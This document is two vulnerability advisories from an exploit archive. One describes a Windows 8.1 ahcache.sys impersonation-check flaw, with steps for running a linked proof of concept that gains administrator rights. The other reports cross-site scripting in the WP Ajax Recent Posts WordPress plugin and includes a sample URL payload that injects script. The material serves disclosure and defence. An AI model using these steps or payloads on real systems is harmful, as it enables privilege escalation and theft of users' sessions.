# Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1 # Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35661-poc.zip Platform: Windows 8.1 Update 32/64 bit (No other OS tested) On Windows 8.1 update the system call NtApphelpCacheControl (the code is actually in ahcache.sys) allows application compatibility data to be cached for quick reuse when new processes are created. A normal user can query the cache but cannot add new cached entries as the operation is restricted to administrators. This is checked in the function AhcVerifyAdminContext. This function has a vulnerability where it doesn't correctly check the impersonation token of the caller to determine if the user is an administrator. It reads the caller's impersonation token using PsReferenceImpersonationToken and then does a comparison between the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level of the token so it's possible to get an identify token on your thread from a local system process and bypass this check. For this purpose the PoC abuses the BITS service and COM to get the impersonation token but there are probably other ways. It is just then a case of finding a way to exploit the vulnerability. In the PoC a cache entry is made for an UAC auto-elevate executable (say ComputerDefaults.exe) and sets up the cache to point to the app compat entry for regsvr32 which forces a RedirectExe shim to reload regsvr32.exe. However any executable could be used, the trick would be finding a suitable pre-existing app compat configuration to abuse. It's unclear if Windows 7 is vulnerable as the code path for update has a TCB privilege check on it (although it looks like depending on the flags this might be bypassable). No effort has been made to verify it on Windows 7. NOTE: This is not a bug in UAC, it is just using UAC auto elevation for demonstration purposes. The PoC has been tested on Windows 8.1 update, both 32 bit and 64 bit versions. I'd recommend running on 32 bit just to be sure. To verify perform the following steps: 1) Put the AppCompatCache.exe and Testdll.dll on disk 2) Ensure that UAC is enabled, the current user is a split-token admin and the UAC setting is the default (no prompt for specific executables). 3) Execute AppCompatCache from the command prompt with the command line "AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll". 4) If successful then the calculator should appear running as an administrator. If it doesn't work first time (and you get the ComputerDefaults program) re-run the exploit from 3, there seems to be a caching/timing issue sometimes on first run.

source: https://www.securityfocus.com/bid/47579/info The WP Ajax Recent Posts WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WP Ajax Recent Posts WordPress Plugin 1.0.1 is vulnerable; other versions may also be affected. http://www.example.com/?action=wpAjaxRecentPosts&number=1%27%29%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E